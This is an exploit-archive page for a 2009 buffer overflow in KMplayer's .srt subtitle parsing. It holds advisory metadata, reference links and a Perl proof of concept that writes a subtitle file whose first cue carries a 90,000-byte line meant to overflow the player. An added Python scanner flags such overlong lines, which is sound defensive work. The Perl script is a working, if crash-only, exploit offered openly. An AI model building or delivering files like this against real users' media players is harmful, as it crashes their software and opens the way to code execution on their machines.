KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC

2009.08.23
Credit: b3hz4d
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################

# Oversized text line for the first subtitle cue
$junk="A"x 90000;

# Write a six-cue subtitle file; only cue 1 carries the long line
open(fhandle,">SubTitle.srt");
print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
close(fhandle);
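
A defensive check for the condition this PoC creates, added here as an example and not part of the original advisory or the author's code: it scans .srt data for lines far longer than any real subtitle, so a mail gateway or download filter can quarantine such files before a player opens them. The names scan_srt and make_sample and the 1024-byte limit are assumptions; the page does not state the size of the affected buffer.

```python
import re
import sys

# Assumed policy limit for one subtitle line, in bytes. The page does not give
# the size of the affected buffer; 1024 is a constructed value, far above any
# real subtitle line and far below the PoC's 90000-byte line.
MAX_LINE_BYTES = 1024

TIMING = re.compile(rb"^\d{2}:\d{2}:\d{2}[,.]\d{3}\s*-->\s*\d{2}:\d{2}:\d{2}[,.]\d{3}")
INDEX = re.compile(rb"^\s*(\d{1,9})\s*$")


def scan_srt(data, limit=MAX_LINE_BYTES):
    """Return one finding per line longer than `limit` bytes.

    Works on raw bytes (subtitle encodings vary) and does not rely on blank
    lines between cues, because the file written by the PoC has none.
    """
    findings = []
    cue = None   # index of the cue the current line belongs to, if known
    prev = b""
    for lineno, line in enumerate(data.splitlines(), start=1):
        if TIMING.match(line):
            m = INDEX.match(prev)          # index line precedes the timing line
            cue = int(m.group(1)) if m else None
        if len(line) > limit:              # checked for every line, timing lines too
            findings.append({"cue": cue, "line": lineno, "bytes": len(line)})
        prev = line
    return findings


def make_sample(text):
    """Constructed two-cue sample in the same layout as the PoC's output."""
    return (b"1\n00:00:25,100 --> 00:00:30,900\n" + text + b"\n-pentesters\n"
            b"2\n00:00:31,100 --> 00:00:35,900\nwww.pentesters.ir\n")


if __name__ == "__main__":
    # Usage: python scan_srt.py file1.srt [file2.srt ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for f in scan_srt(fh.read()):
                print(f"{path}: cue {f['cue']} line {f['line']}: {f['bytes']} bytes")
```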

References:

http://xforce.iss.net/xforce/xfdb/51882
http://www.vupen.com/english/advisories/2009/1959
http://www.securityfocus.com/bid/35745
http://www.milw0rm.com/exploits/9220

